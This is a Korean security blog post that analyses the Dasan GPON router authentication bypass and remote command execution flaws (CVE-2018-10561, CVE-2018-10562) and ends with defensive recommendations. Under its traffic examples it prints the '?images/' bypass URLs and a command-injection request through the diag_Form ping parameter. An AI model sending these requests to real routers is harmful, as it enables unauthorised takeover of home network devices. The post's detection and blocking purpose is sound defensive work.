반응형
Dasan GPON Home Routers Authentication Bypass (CVE-2018-10561, CVE-2018-10562) 분석 자료
Dasan Zhone Solutions 홈 라우터(공유기)에서 발견된 인증을 우회하여 원격 코드 실행이 가능한 취약점 공격
2018년에 발견된 취약점이지만 최근(2022년)까지 공격 트래픽이 탐지되고 있음
관련 취약점
- CVE-2018-10561
: Request URL에 ?images/ 문자열을 추가하여 인증 우회가 가능함 - CVE-2018-10562
: 인증 우회 후 원격 코드를 실행할 수 있음
취약점 트래픽 예
- 인증 우회
/GponForm/diag_Form?images/
/menu.html?images/
- 인증 우회 & 명령 실행
XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host= \`$2\`;$2&ipv=0" $1/GponForm/diag_Form?images/ 2>/dev/null 1>/dev/null
/diag.html?images/ 2>/dev/null | grep 'diag_result = ' | sed -e 's/\\n/\n/g'
관련 제품
결론
- Dasan GPON Home Router 사용 유무 확인
- 공격자 IP 접근 제어
- 보안 시스템에서 IP or URL or signature 탐지 및 차단
- (참고)vpnMentor에서 제공하는 비공식 패치 툴이 있으나 별도의 툴 사용과 타사의 패치 프로그램을 사용해야 함
* 제조사의 정식 취약점 패치 버전에 대한 정보를 찾기 어려움
반응형
'IT 보안' 카테고리의 다른 글
Apache Log4j 취약점 (CVE-2021-44228) 분석 자료 (0) | 2024.09.23 |
---|---|
FBI FLASH CP-000169-TT CP-000165-TT (0) | 2024.09.23 |
VMware RCE 취약점(CVE-2021-21978, CVE-2021-21985) 분석 자료 (0) | 2024.09.23 |
아파치 웹 서비스 공격 탐지 분석 자료 (0) | 2024.09.23 |
PHP 취약점 공격 / CVE-2017-9841, CVE-2019-16759 분석 자료 (0) | 2024.09.23 |